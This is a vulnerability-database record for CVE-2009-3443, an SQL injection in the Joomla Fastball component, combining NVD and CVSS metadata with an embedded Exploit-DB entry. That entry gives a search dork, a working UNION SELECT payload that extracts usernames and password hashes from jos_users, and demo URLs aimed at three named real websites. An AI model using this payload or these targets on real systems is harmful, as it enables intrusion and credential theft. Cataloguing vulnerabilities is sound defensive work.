ID CVE-2009-3443Type cveReporter cve@mitre.orgModified 2009-09-29T04:00:00
Description
SQL injection vulnerability in the Fastball (com_fastball) component 1.1.0 through 1.2 for Joomla! allows remote attackers to execute arbitrary SQL commands via the league parameter to index.php.
{"id": "CVE-2009-3443", "bulletinFamily": "NVD", "title": "CVE-2009-3443", "description": "SQL injection vulnerability in the Fastball (com_fastball) component 1.1.0 through 1.2 for Joomla! allows remote attackers to execute arbitrary SQL commands via the league parameter to index.php.", "published": "2009-09-28T22:30:00", "modified": "2009-09-29T04:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3443", "reporter": "cve@mitre.org", "references": ["http://secunia.com/advisories/36878", "http://packetstormsecurity.org/0909-exploits/joomlafastball-sql.txt"], "cvelist": ["CVE-2009-3443"], "type": "cve", "lastseen": "2021-02-02T05:40:05", "edition": 4, "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:9822"]}], "modified": "2021-02-02T05:40:05", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-02-02T05:40:05", "rev": 2}, "vulnersScore": 7.3}, "cpe": ["cpe:/a:fastballproductions:com_fastball:1.1.0", "cpe:/a:fastballproductions:com_fastball:1.2"], "affectedSoftware": [{"cpeName": "fastballproductions:com_fastball", "name": "fastballproductions com fastball", "operator": "eq", "version": "1.2"}, {"cpeName": "fastballproductions:com_fastball", "name": "fastballproductions com fastball", "operator": "eq", "version": "1.1.0"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:fastballproductions:com_fastball:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:fastballproductions:com_fastball:1.1.0:*:*:*:*:*:*:*"], "cwe": ["CWE-89"], "scheme": null, "affectedConfiguration": [{"cpeName": "joomla:joomla", "name": "joomla", "operator": "eq", "version": "*"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:fastballproductions:com_fastball:1.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:fastballproductions:com_fastball:1.1.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*", "vulnerable": false}], "operator": "OR"}], "operator": "AND"}]}, "extraReferences": [{"name": "http://packetstormsecurity.org/0909-exploits/joomlafastball-sql.txt", "refsource": "MISC", "tags": ["Exploit"], "url": "http://packetstormsecurity.org/0909-exploits/joomlafastball-sql.txt"}, {"name": "36878", "refsource": "SECUNIA", "tags": ["Vendor Advisory"], "url": "http://secunia.com/advisories/36878"}]}
{"exploitdb": [{"lastseen": "2016-02-01T11:19:30", "description": "Joomla Fastball component 1.1.0-1.2 SQL Injection. CVE-2009-3443. Webapps exploit for php platform", "published": "2009-09-24T00:00:00", "type": "exploitdb", "title": "Joomla Fastball component 1.1.0-1.2 - SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3443"], "modified": "2009-09-24T00:00:00", "id": "EDB-ID:9822", "href": "https://www.exploit-db.com/exploits/9822/", "sourceData": "########################################################################################################\r\n## Joomla Component com_fastball Remote SQL injection vulnerability - (league)\t \t\t ##\r\n## Author : kaMtiEz (kamzcrew@gmail.com)\t\t\t\t\t\t\t ##\r\n## Homepage : http://www.indonesiancoder.com \t \t\t\t\t\t ##\r\n## Date : September 23, 2009 \t\t\t\t\t\t\t\t\t ##\r\n########################################################################################################\r\n# Hello My Name Is : ##\r\n# __ _____ __ ._____________ ##\r\n# | | _______ / \\_/ |_|__\\_ _____/_______ ##\r\n# | |/ /\\__ \\ / \\ / \\ __\\ || __)_\\___ / ##\r\n# | < / __ \\_/ Y \\ | | || \\/ / ##\r\n# |__|_ \\(____ /\\____|__ /__| |__/_______ /_____ \\ ##\r\n# \\/ \\/ \\/ \\/ \\/ -=- INDONESIAN CODER -=- KILL-9 CREW -=- ##\r\n########################################################################################################\r\n\r\n[ Software Information ]\r\n\r\n[+] Vendor : http://www.fastballproductions.com/\r\n[+] Download : http://www.fastballproductions.com/index.php?option=com_digistore&task=list_products&id=1&Itemid=32\r\n[+] version : 1.1.0 - 1.2\r\n[+] Vulnerability : SQL injection\r\n[+] Dork : inurl:\"com_fastball\"\r\n[+] Location : INDONESIA\r\n#############################################################################################################\r\n\r\n[ Vulnerable File ]\r\n\r\nhttp://127.0.0.1/index.php?option=com_fastball&league=[INDONESIANCODER]\r\n\r\n[ Exploit ]\r\n\r\n-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11+from+jos_users--\r\n\r\n[ Demo ]\r\n\r\nhttp://diamondblacks.com/index.php?option=com_fastball&league=-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11+from+jos_users--\r\n\r\nhttp://sandiegoturbos.com/index.php?option=com_fastball&league=-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11+from+jos_users--\r\n\r\nhttp://www.unibaseball.co.uk/index.php?option=com_fastball&league=-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11+from+jos_users--\r\n\r\n#############################################################################################################\r\n\r\n[ Thx TO ]\r\n\r\n[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW\r\n[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h\r\n[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz\r\n[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy,devil_nongkrong and YOU!!\r\n\r\n[ NOTE ] \r\n\r\n[+] makasih buad babe and enyak .... muach ..\r\n[+] makasih buat om tukulesto yg menemani saia selalu dan enggak bosen ma gue .. hahaha\r\n[+] aurakasih napa sih lo susah banget di hubungi ?? .. hha\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/9822/"}]}
